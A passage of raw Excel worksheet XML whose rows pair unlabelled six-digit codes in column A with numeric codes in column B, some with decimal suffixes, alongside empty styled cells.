      <c r="E3026" s="3"/>
      <c r="F3026" s="1"/>
      <c r="H3026" s="1"/>
    </row>
    <row r="3027" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3027" s="5">
        <v>700203</v>
      </c>
      <c r="B3027" s="3">
        <v>901048</v>
      </c>
      <c r="D3027" s="5"/>
      <c r="E3027" s="3"/>
      <c r="F3027" s="1"/>
      <c r="H3027" s="1"/>
    </row>
    <row r="3028" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3028" s="5">
        <v>700203</v>
      </c>
      <c r="B3028" s="3">
        <v>901083</v>
      </c>
      <c r="D3028" s="5"/>
      <c r="E3028" s="3"/>
      <c r="F3028" s="1"/>
      <c r="H3028" s="1"/>
    </row>
    <row r="3029" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3029" s="5">
        <v>700203</v>
      </c>
      <c r="B3029" s="3">
        <v>901070.00100000005</v>
      </c>
      <c r="D3029" s="5"/>
      <c r="E3029" s="3"/>
      <c r="F3029" s="1"/>
      <c r="H3029" s="1"/>
    </row>
    <row r="3030" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3030" s="5">
        <v>700203</v>
      </c>
      <c r="B3030" s="3">
        <v>901105</v>
      </c>
      <c r="D3030" s="5"/>
      <c r="E3030" s="3"/>
      <c r="F3030" s="1"/>
      <c r="H3030" s="1"/>
    </row>
    <row r="3031" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3031" s="5">
        <v>700203</v>
      </c>
      <c r="B3031" s="3">
        <v>901112</v>
      </c>
      <c r="D3031" s="5"/>
      <c r="E3031" s="3"/>
      <c r="F3031" s="1"/>
      <c r="H3031" s="1"/>
    </row>
    <row r="3032" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3032" s="5">
        <v>700203</v>
      </c>
      <c r="B3032" s="3">
        <v>901027</v>
      </c>
      <c r="D3032" s="5"/>
      <c r="E3032" s="3"/>
      <c r="F3032" s="1"/>
      <c r="H3032" s="1"/>
    </row>
    <row r="3033" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3033" s="5">
        <v>700203</v>
      </c>
      <c r="B3033" s="3">
        <v>901057</v>
      </c>
      <c r="D3033" s="5"/>
      <c r="E3033" s="3"/>
      <c r="F3033" s="1"/>
      <c r="H3033" s="1"/>
    </row>
    <row r="3034" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3034" s="5">
        <v>700203</v>
      </c>
      <c r="B3034" s="3">
        <v>901012</v>
      </c>
      <c r="D3034" s="5"/>
      <c r="E3034" s="3"/>
      <c r="F3034" s="1"/>
      <c r="H3034" s="1"/>
    </row>
    <row r="3035" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3035" s="5">
        <v>700203</v>
      </c>
      <c r="B3035" s="3">
        <v>901113</v>
      </c>
      <c r="D3035" s="5"/>
      <c r="E3035" s="3"/>
      <c r="F3035" s="1"/>
      <c r="H3035" s="1"/>
    </row>
    <row r="3036" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3036" s="5">
        <v>700203</v>
      </c>
      <c r="B3036" s="3">
        <v>901129</v>
      </c>
      <c r="D3036" s="5"/>
      <c r="E3036" s="3"/>
      <c r="F3036" s="1"/>
      <c r="H3036" s="1"/>
    </row>
    <row r="3037" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3037" s="5">
        <v>700203</v>
      </c>
      <c r="B3037" s="3">
        <v>901082</v>
      </c>
      <c r="D3037" s="5"/>
      <c r="E3037" s="3"/>
      <c r="F3037" s="1"/>
      <c r="H3037" s="1"/>
    </row>
    <row r="3038" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3038" s="5">
        <v>700203</v>
      </c>
      <c r="B3038" s="3">
        <v>901016</v>
      </c>
      <c r="D3038" s="5"/>
      <c r="E3038" s="3"/>
      <c r="F3038" s="1"/>
      <c r="H3038" s="1"/>
    </row>
    <row r="3039" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3039" s="5">
        <v>700203</v>
      </c>
      <c r="B3039" s="3">
        <v>901007</v>
      </c>
      <c r="D3039" s="5"/>
      <c r="E3039" s="3"/>
      <c r="F3039" s="1"/>
      <c r="H3039" s="1"/>
    </row>
    <row r="3040" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3040" s="5">
        <v>700203</v>
      </c>
      <c r="B3040" s="3">
        <v>901569.00199999998</v>
      </c>
      <c r="D3040" s="5"/>
      <c r="E3040" s="3"/>
      <c r="F3040" s="1"/>
      <c r="H3040" s="1"/>
    </row>
    <row r="3041" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3041" s="5">
        <v>700398</v>
      </c>
      <c r="B3041" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D3041" s="5"/>
      <c r="E3041" s="3"/>
      <c r="F3041" s="1"/>
      <c r="H3041" s="1"/>
    </row>
    <row r="3042" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3042" s="5">
        <v>700398</v>
      </c>
      <c r="B3042" s="3">
        <v>901574.00199999998</v>
      </c>
      <c r="D3042" s="5"/>
      <c r="E3042" s="3"/>
      <c r="F3042" s="1"/>
      <c r="H3042" s="1"/>
    </row>
    <row r="3043" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3043" s="5">
        <v>700398</v>
      </c>
      <c r="B3043" s="3">
        <v>901105</v>
      </c>
      <c r="D3043" s="5"/>
      <c r="E3043" s="3"/>
      <c r="F3043" s="1"/>
      <c r="H3043" s="1"/>
    </row>
    <row r="3044" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3044" s="5">
        <v>700398</v>
      </c>
      <c r="B3044" s="3">
        <v>901106</v>
      </c>
      <c r="D3044" s="5"/>
      <c r="E3044" s="3"/>
      <c r="F3044" s="1"/>
      <c r="H3044" s="1"/>
    </row>
    <row r="3045" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3045" s="5">
        <v>700398</v>
      </c>
      <c r="B3045" s="3">
        <v>901055</v>
      </c>
      <c r="D3045" s="5"/>
      <c r="E3045" s="3"/>
      <c r="F3045" s="1"/>
      <c r="H3045" s="1"/>
    </row>
    <row r="3046" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3046" s="5">
        <v>700398</v>
      </c>
      <c r="B3046" s="3">
        <v>901113</v>
      </c>
      <c r="D3046" s="5"/>
      <c r="E3046" s="3"/>
      <c r="F3046" s="1"/>
      <c r="H3046" s="1"/>
    </row>
    <row r="3047" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3047" s="5">
        <v>700398</v>
      </c>
      <c r="B3047" s="3">
        <v>901007</v>
      </c>
      <c r="D3047" s="5"/>
      <c r="E3047" s="3"/>
      <c r="F3047" s="1"/>
      <c r="H3047" s="1"/>
    </row>
    <row r="3048" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3048" s="5">
        <v>700398</v>
      </c>
      <c r="B3048" s="3">
        <v>901569.00199999998</v>
      </c>
      <c r="D3048" s="5"/>
      <c r="E3048" s="3"/>
      <c r="F3048" s="1"/>
      <c r="H3048" s="1"/>
    </row>
    <row r="3049" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3049" s="5">
        <v>700537</v>
      </c>
      <c r="B3049" s="3">
        <v>901087.00100000005</v>
      </c>
      <c r="D3049" s="5"/>
      <c r="E3049" s="3"/>
      <c r="F3049" s="1"/>
      <c r="H3049" s="1"/>
    </row>
    <row r="3050" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3050" s="5">
        <v>700537</v>
      </c>
      <c r="B3050" s="3">
        <v>901573.00100000005</v>
      </c>
      <c r="D3050" s="5"/>
      <c r="E3050" s="3"/>
      <c r="F3050" s="1"/>
      <c r="H3050" s="1"/>
    </row>
    <row r="3051" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3051" s="5">
        <v>700537</v>
      </c>
      <c r="B3051" s="3">
        <v>901559</v>
      </c>
      <c r="D3051" s="5"/>
      <c r="E3051" s="3"/>
      <c r="F3051" s="1"/>
      <c r="H3051" s="1"/>
    </row>
    <row r="3052" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3052" s="5">
        <v>700537</v>
      </c>
      <c r="B3052" s="3">
        <v>901112</v>
      </c>
      <c r="D3052" s="5"/>
      <c r="E3052" s="3"/>
      <c r="F3052" s="1"/>
      <c r="H3052" s="1"/>
    </row>
    <row r="3053" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3053" s="5">
        <v>700537</v>
      </c>
      <c r="B3053" s="3">
        <v>901106</v>
      </c>
      <c r="D3053" s="5"/>
      <c r="E3053" s="3"/>
      <c r="F3053" s="1"/>
      <c r="H3053" s="1"/>
    </row>
    <row r="3054" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3054" s="5">
        <v>700537</v>
      </c>
      <c r="B3054" s="3">
        <v>901078.00100000005</v>
      </c>
      <c r="D3054" s="5"/>
      <c r="E3054" s="3"/>
      <c r="F3054" s="1"/>
      <c r="H3054" s="1"/>
    </row>
    <row r="3055" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3055" s="5">
        <v>700483</v>
      </c>
      <c r="B3055" s="3">
        <v>901087.00199999998</v>
      </c>
      <c r="D3055" s="5"/>
      <c r="E3055" s="3"/>
      <c r="F3055" s="1"/>
      <c r="H3055" s="1"/>
    </row>
    <row r="3056" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3056" s="5">
        <v>700483</v>
      </c>
      <c r="B3056" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D3056" s="5"/>
      <c r="E3056" s="3"/>
      <c r="F3056" s="1"/>
      <c r="H3056" s="1"/>
    </row>
    <row r="3057" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3057" s="5">
        <v>700483</v>
      </c>
      <c r="B3057" s="3">
        <v>901547.00100000005</v>
      </c>
      <c r="D3057" s="5"/>
      <c r="E3057" s="3"/>
      <c r="F3057" s="1"/>
      <c r="H3057" s="1"/>
    </row>
    <row r="3058" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3058" s="5">
        <v>700483</v>
      </c>
      <c r="B3058" s="3">
        <v>901185</v>
      </c>
      <c r="D3058" s="5"/>
      <c r="E3058" s="3"/>
      <c r="F3058" s="1"/>
      <c r="H3058" s="1"/>
    </row>
    <row r="3059" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3059" s="5">
        <v>700483</v>
      </c>
      <c r="B3059" s="3">
        <v>901059.005</v>
      </c>
      <c r="D3059" s="5"/>
      <c r="E3059" s="3"/>
      <c r="F3059" s="1"/>
      <c r="H3059" s="1"/>
    </row>
    <row r="3060" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3060" s="5">
        <v>700483</v>
      </c>
      <c r="B3060" s="3">
        <v>901573.00199999998</v>
      </c>
      <c r="D3060" s="5"/>
      <c r="E3060" s="3"/>
      <c r="F3060" s="1"/>
      <c r="H3060" s="1"/>
    </row>
    <row r="3061" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3061" s="5">
        <v>700483</v>
      </c>
      <c r="B3061" s="3">
        <v>901105</v>
      </c>
      <c r="D3061" s="5"/>
      <c r="E3061" s="3"/>
      <c r="F3061" s="1"/>
      <c r="H3061" s="1"/>
    </row>
    <row r="3062" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3062" s="5">
        <v>700483</v>
      </c>
      <c r="B3062" s="3">
        <v>901106</v>
      </c>
      <c r="D3062" s="5"/>
      <c r="E3062" s="3"/>
      <c r="F3062" s="1"/>
      <c r="H3062" s="1"/>
    </row>
    <row r="3063" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3063" s="5">
        <v>700483</v>
      </c>
      <c r="B3063" s="3">
        <v>901027</v>
      </c>
      <c r="D3063" s="5"/>
      <c r="E3063" s="3"/>
      <c r="F3063" s="1"/>
      <c r="H3063" s="1"/>
    </row>
    <row r="3064" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3064" s="5">
        <v>700483</v>
      </c>
      <c r="B3064" s="3">
        <v>901027.00199999998</v>
      </c>
      <c r="D3064" s="5"/>
      <c r="E3064" s="3"/>
      <c r="F3064" s="1"/>
      <c r="H3064" s="1"/>
    </row>
    <row r="3065" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3065" s="5">
        <v>700483</v>
      </c>
      <c r="B3065" s="3">
        <v>901027.00300000003</v>
      </c>
      <c r="D3065" s="5"/>
      <c r="E3065" s="3"/>
      <c r="F3065" s="1"/>
      <c r="H3065" s="1"/>
    </row>
    <row r="3066" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3066" s="5">
        <v>700483</v>
      </c>
      <c r="B3066" s="3">
        <v>901069</v>
      </c>
      <c r="D3066" s="5"/>
      <c r="E3066" s="3"/>
      <c r="F3066" s="1"/>
      <c r="H3066" s="1"/>
    </row>
    <row r="3067" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3067" s="5">
        <v>700483</v>
      </c>
      <c r="B3067" s="3">
        <v>901566.00100000005</v>
      </c>
      <c r="D3067" s="5"/>
      <c r="E3067" s="3"/>
      <c r="F3067" s="1"/>
      <c r="H3067" s="1"/>
    </row>
    <row r="3068" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3068" s="5">
        <v>700483</v>
      </c>
      <c r="B3068" s="3">
        <v>901055.00399999996</v>
      </c>
      <c r="D3068" s="5"/>
      <c r="E3068" s="3"/>
      <c r="F3068" s="1"/>
      <c r="H3068" s="1"/>
    </row>
    <row r="3069" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3069" s="5">
        <v>700483</v>
      </c>
      <c r="B3069" s="3">
        <v>901053.005</v>
      </c>
      <c r="D3069" s="5"/>
      <c r="E3069" s="3"/>
      <c r="F3069" s="1"/>
      <c r="H3069" s="1"/>
    </row>
    <row r="3070" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3070" s="5">
        <v>700483</v>
      </c>
      <c r="B3070" s="3">
        <v>901218.00699999998</v>
      </c>
      <c r="D3070" s="5"/>
      <c r="E3070" s="3"/>
      <c r="F3070" s="1"/>
      <c r="H3070" s="1"/>
    </row>
    <row r="3071" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3071" s="5">
        <v>700483</v>
      </c>
      <c r="B3071" s="3">
        <v>901082</v>
      </c>
      <c r="D3071" s="5"/>
      <c r="E3071" s="3"/>
      <c r="F3071" s="1"/>
      <c r="H3071" s="1"/>
    </row>
    <row r="3072" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3072" s="5">
        <v>700483</v>
      </c>
      <c r="B3072" s="3">
        <v>901204.00199999998</v>
      </c>
      <c r="D3072" s="5"/>
      <c r="E3072" s="3"/>
      <c r="F3072" s="1"/>
      <c r="H3072" s="1"/>
    </row>
    <row r="3073" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3073" s="5">
        <v>700483</v>
      </c>
      <c r="B3073" s="3">
        <v>901047</v>
      </c>
      <c r="D3073" s="5"/>
      <c r="E3073" s="3"/>
      <c r="F3073" s="1"/>
      <c r="H3073" s="1"/>
    </row>
    <row r="3074" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3074" s="5">
        <v>700101</v>
      </c>
      <c r="B3074" s="3">
        <v>901016</v>
      </c>
      <c r="D3074" s="5"/>
      <c r="E3074" s="3"/>
      <c r="F3074" s="1"/>
      <c r="H3074" s="1"/>
    </row>
    <row r="3075" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3075" s="5">
        <v>700278</v>
      </c>
      <c r="B3075" s="3">
        <v>901560.00100000005</v>
      </c>
      <c r="D3075" s="5"/>
      <c r="E3075" s="3"/>
      <c r="F3075" s="1"/>
      <c r="H3075" s="1"/>
    </row>
    <row r="3076" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3076" s="5">
        <v>700278</v>
      </c>
      <c r="B3076" s="3">
        <v>901037.00399999996</v>
      </c>
      <c r="D3076" s="5"/>
      <c r="E3076" s="3"/>
      <c r="F3076" s="1"/>
      <c r="H3076" s="1"/>
    </row>
    <row r="3077" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3077" s="5">
        <v>700278</v>
      </c>
      <c r="B3077" s="3">
        <v>901555.00100000005</v>
      </c>
      <c r="D3077" s="5"/>
      <c r="E3077" s="3"/>
      <c r="F3077" s="1"/>
      <c r="H3077" s="1"/>
    </row>
    <row r="3078" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3078" s="5">
        <v>700278</v>
      </c>
      <c r="B3078" s="3">
        <v>901564.00100000005</v>
      </c>
      <c r="D3078" s="5"/>
      <c r="E3078" s="3"/>
      <c r="F3078" s="1"/>
      <c r="H3078" s="1"/>
    </row>
    <row r="3079" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3079" s="5">
        <v>700278</v>
      </c>
      <c r="B3079" s="3">
        <v>901056.00199999998</v>
      </c>
      <c r="D3079" s="5"/>
      <c r="E3079" s="3"/>
      <c r="F3079" s="1"/>
      <c r="H3079" s="1"/>
    </row>
    <row r="3080" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3080" s="5">
        <v>700278</v>
      </c>
      <c r="B3080" s="3">
        <v>901057</v>
      </c>
      <c r="D3080" s="5"/>
      <c r="E3080" s="3"/>
      <c r="F3080" s="1"/>
      <c r="H3080" s="1"/>
    </row>
    <row r="3081" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3081" s="5">
        <v>700278</v>
      </c>
      <c r="B3081" s="3">
        <v>901016</v>
      </c>
      <c r="D3081" s="5"/>
      <c r="E3081" s="3"/>
      <c r="F3081" s="1"/>
      <c r="H3081" s="1"/>
    </row>
    <row r="3082" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3082" s="5">
        <v>700434</v>
      </c>
      <c r="B3082" s="3">
        <v>901123</v>
      </c>
      <c r="D3082" s="5"/>
      <c r="E3082" s="3"/>
      <c r="F3082" s="1"/>
      <c r="H3082" s="1"/>
    </row>
    <row r="3083" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3083" s="5">
        <v>700434</v>
      </c>
      <c r="B3083" s="3">
        <v>901059</v>
      </c>
      <c r="D3083" s="5"/>
      <c r="E3083" s="3"/>
      <c r="F3083" s="1"/>
      <c r="H3083" s="1"/>
    </row>
    <row r="3084" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3084" s="5">
        <v>700434</v>
      </c>
      <c r="B3084" s="3">
        <v>901555.00300000003</v>
      </c>
      <c r="D3084" s="5"/>
      <c r="E3084" s="3"/>
      <c r="F3084" s="1"/>
      <c r="H3084" s="1"/>
    </row>
    <row r="3085" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3085" s="5">
        <v>700434</v>
      </c>
      <c r="B3085" s="3">
        <v>901140</v>
      </c>
      <c r="D3085" s="5"/>
      <c r="E3085" s="3"/>
      <c r="F3085" s="1"/>
      <c r="H3085" s="1"/>
    </row>
    <row r="3086" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3086" s="5">
        <v>700434</v>
      </c>
      <c r="B3086" s="3">
        <v>901041</v>
      </c>
      <c r="D3086" s="5"/>
      <c r="E3086" s="3"/>
      <c r="F3086" s="1"/>
      <c r="H3086" s="1"/>
    </row>
    <row r="3087" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3087" s="5">
        <v>700434</v>
      </c>
      <c r="B3087" s="3">
        <v>901083</v>
      </c>
      <c r="D3087" s="5"/>
      <c r="E3087" s="3"/>
      <c r="F3087" s="1"/>
      <c r="H3087" s="1"/>
    </row>
    <row r="3088" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3088" s="5">
        <v>700434</v>
      </c>
      <c r="B3088" s="3">
        <v>901564.00100000005</v>
      </c>
      <c r="D3088" s="5"/>
      <c r="E3088" s="3"/>
      <c r="F3088" s="1"/>
      <c r="H3088" s="1"/>
    </row>
    <row r="3089" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3089" s="5">
        <v>700434</v>
      </c>
      <c r="B3089" s="3">
        <v>901562.00100000005</v>
      </c>
      <c r="D3089" s="5"/>
      <c r="E3089" s="3"/>
      <c r="F3089" s="1"/>
      <c r="H3089" s="1"/>
    </row>
    <row r="3090" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3090" s="5">
        <v>700434</v>
      </c>
      <c r="B3090" s="3">
        <v>901070.00399999996</v>
      </c>
      <c r="D3090" s="5"/>
      <c r="E3090" s="3"/>
      <c r="F3090" s="1"/>
      <c r="H3090" s="1"/>
    </row>
    <row r="3091" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3091" s="5">
        <v>700434</v>
      </c>
      <c r="B3091" s="3">
        <v>901056.00100000005</v>
      </c>
      <c r="D3091" s="5"/>
      <c r="E3091" s="3"/>
      <c r="F3091" s="1"/>
      <c r="H3091" s="1"/>
    </row>
    <row r="3092" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3092" s="5">
        <v>700434</v>
      </c>
      <c r="B3092" s="3">
        <v>901106</v>
      </c>
      <c r="D3092" s="5"/>
      <c r="E3092" s="3"/>
      <c r="F3092" s="1"/>
      <c r="H3092" s="1"/>
    </row>
    <row r="3093" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3093" s="5">
        <v>700434</v>
      </c>
      <c r="B3093" s="3">
        <v>901027</v>
      </c>
      <c r="D3093" s="5"/>
      <c r="E3093" s="3"/>
      <c r="F3093" s="1"/>
      <c r="H3093" s="1"/>
    </row>
    <row r="3094" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3094" s="5">
        <v>700434</v>
      </c>
      <c r="B3094" s="3">
        <v>901057</v>
      </c>
      <c r="D3094" s="5"/>
      <c r="E3094" s="3"/>
      <c r="F3094" s="1"/>
      <c r="H3094" s="1"/>
    </row>
    <row r="3095" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3095" s="5">
        <v>700434</v>
      </c>
      <c r="B3095" s="3">
        <v>901021.00100000005</v>
      </c>
      <c r="D3095" s="5"/>
      <c r="E3095" s="3"/>
      <c r="F3095" s="1"/>
      <c r="H3095" s="1"/>
    </row>
    <row r="3096" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3096" s="5">
        <v>700434</v>
      </c>
      <c r="B3096" s="3">
        <v>901496</v>
      </c>
      <c r="D3096" s="5"/>
      <c r="E3096" s="3"/>
      <c r="F3096" s="1"/>
      <c r="H3096" s="1"/>
    </row>
    <row r="3097" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3097" s="5">
        <v>700434</v>
      </c>
      <c r="B3097" s="3">
        <v>901125</v>
      </c>
      <c r="D3097" s="5"/>
      <c r="E3097" s="3"/>
      <c r="F3097" s="1"/>
      <c r="H3097" s="1"/>
    </row>
    <row r="3098" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3098" s="5">
        <v>700357</v>
      </c>
      <c r="B3098" s="3">
        <v>901557.00100000005</v>
      </c>
      <c r="D3098" s="5"/>
      <c r="E3098" s="3"/>
      <c r="F3098" s="1"/>
      <c r="H3098" s="1"/>
    </row>
    <row r="3099" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3099" s="5">
        <v>700357</v>
      </c>
      <c r="B3099" s="3">
        <v>901040</v>
      </c>
      <c r="D3099" s="5"/>
      <c r="E3099" s="3"/>
      <c r="F3099" s="1"/>
      <c r="H3099" s="1"/>
    </row>
    <row r="3100" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3100" s="5">
        <v>700357</v>
      </c>
      <c r="B3100" s="3">
        <v>901003.00100000005</v>
      </c>
      <c r="D3100" s="5"/>
      <c r="E3100" s="3"/>
      <c r="F3100" s="1"/>
      <c r="H3100" s="1"/>
    </row>
    <row r="3101" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3101" s="5">
        <v>700357</v>
      </c>
      <c r="B3101" s="3">
        <v>901003.00199999998</v>
      </c>
      <c r="D3101" s="5"/>
      <c r="E3101" s="3"/>
      <c r="F3101" s="1"/>
      <c r="H3101" s="1"/>
    </row>
    <row r="3102" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3102" s="5">
        <v>700357</v>
      </c>
      <c r="B3102" s="3">
        <v>901003.00300000003</v>
      </c>
      <c r="D3102" s="5"/>
      <c r="E3102" s="3"/>
      <c r="F3102" s="1"/>
      <c r="H3102" s="1"/>
    </row>
    <row r="3103" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3103" s="5">
        <v>700357</v>
      </c>
      <c r="B3103" s="3">
        <v>901558.00300000003</v>
      </c>
      <c r="D3103" s="5"/>
      <c r="E3103" s="3"/>
      <c r="F3103" s="1"/>
      <c r="H3103" s="1"/>
    </row>
    <row r="3104" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3104" s="5">
        <v>700357</v>
      </c>
      <c r="B3104" s="3">
        <v>901569.00199999998</v>
      </c>
      <c r="D3104" s="5"/>
      <c r="E3104" s="3"/>
      <c r="F3104" s="1"/>
      <c r="H3104" s="1"/>
    </row>
    <row r="3105" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3105" s="5">
        <v>700357</v>
      </c>
      <c r="B3105" s="3">
        <v>901047</v>
      </c>
      <c r="D3105" s="5"/>
      <c r="E3105" s="3"/>
      <c r="F3105" s="1"/>
      <c r="H3105" s="1"/>
    </row>
    <row r="3106" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3106" s="5">
        <v>700604</v>
      </c>
      <c r="B3106" s="3">
        <v>901071.00100000005</v>
      </c>
      <c r="D3106" s="5"/>
      <c r="E3106" s="3"/>
      <c r="F3106" s="1"/>
      <c r="H3106" s="1"/>
    </row>
    <row r="3107" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3107" s="5">
        <v>700604</v>
      </c>
      <c r="B3107" s="3">
        <v>901554</v>
      </c>
      <c r="D3107" s="5"/>
      <c r="E3107" s="3"/>
      <c r="F3107" s="1"/>
      <c r="H3107" s="1"/>
    </row>
    <row r="3108" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3108" s="5">
        <v>700604</v>
      </c>
      <c r="B3108" s="3">
        <v>901543.00300000003</v>
      </c>
      <c r="D3108" s="5"/>
      <c r="E3108" s="3"/>
      <c r="F3108" s="1"/>
      <c r="H3108" s="1"/>
    </row>
    <row r="3109" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3109" s="5">
        <v>700604</v>
      </c>
      <c r="B3109" s="3">
        <v>901485</v>
      </c>
      <c r="D3109" s="5"/>
      <c r="E3109" s="3"/>
      <c r="F3109" s="1"/>
      <c r="H3109" s="1"/>
    </row>
    <row r="3110" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3110" s="5">
        <v>700604</v>
      </c>
      <c r="B3110" s="3">
        <v>901140</v>
      </c>
      <c r="D3110" s="5"/>
      <c r="E3110" s="3"/>
      <c r="F3110" s="1"/>
      <c r="H3110" s="1"/>
    </row>
    <row r="3111" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3111" s="5">
        <v>700604</v>
      </c>
      <c r="B3111" s="3">
        <v>901499.00399999996</v>
      </c>
      <c r="D3111" s="5"/>
      <c r="E3111" s="3"/>
      <c r="F3111" s="1"/>
      <c r="H3111" s="1"/>
    </row>
    <row r="3112" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3112" s="5">
        <v>700604</v>
      </c>
      <c r="B3112" s="3">
        <v>901041</v>
      </c>
      <c r="D3112" s="5"/>
      <c r="E3112" s="3"/>
      <c r="F3112" s="1"/>
      <c r="H3112" s="1"/>
    </row>
    <row r="3113" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3113" s="5">
        <v>700604</v>
      </c>
      <c r="B3113" s="3">
        <v>901083</v>
      </c>
      <c r="D3113" s="5"/>
      <c r="E3113" s="3"/>
      <c r="F3113" s="1"/>
      <c r="H3113" s="1"/>
    </row>
    <row r="3114" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3114" s="5">
        <v>700604</v>
      </c>
      <c r="B3114" s="3">
        <v>901105</v>
      </c>
      <c r="D3114" s="5"/>
      <c r="E3114" s="3"/>
      <c r="F3114" s="1"/>
      <c r="H3114" s="1"/>
    </row>
    <row r="3115" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3115" s="5">
        <v>700604</v>
      </c>
      <c r="B3115" s="3">
        <v>901046</v>
      </c>
      <c r="D3115" s="5"/>
      <c r="E3115" s="3"/>
      <c r="F3115" s="1"/>
      <c r="H3115" s="1"/>
    </row>
    <row r="3116" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3116" s="5">
        <v>700604</v>
      </c>
      <c r="B3116" s="3">
        <v>901027</v>
      </c>
      <c r="D3116" s="5"/>
      <c r="E3116" s="3"/>
      <c r="F3116" s="1"/>
      <c r="H3116" s="1"/>
    </row>
    <row r="3117" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3117" s="5">
        <v>700604</v>
      </c>
      <c r="B3117" s="3">
        <v>901572</v>
      </c>
      <c r="D3117" s="5"/>
      <c r="E3117" s="3"/>
      <c r="F3117" s="1"/>
      <c r="H3117" s="1"/>
    </row>
    <row r="3118" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3118" s="5">
        <v>700604</v>
      </c>
      <c r="B3118" s="3">
        <v>901090.00300000003</v>
      </c>
      <c r="D3118" s="5"/>
      <c r="E3118" s="3"/>
      <c r="F3118" s="1"/>
      <c r="H3118" s="1"/>
    </row>
    <row r="3119" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3119" s="5">
        <v>700604</v>
      </c>
      <c r="B3119" s="3">
        <v>901012</v>
      </c>
      <c r="D3119" s="5"/>
      <c r="E3119" s="3"/>
      <c r="F3119" s="1"/>
      <c r="H3119" s="1"/>
    </row>
    <row r="3120" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A3120" s="5">
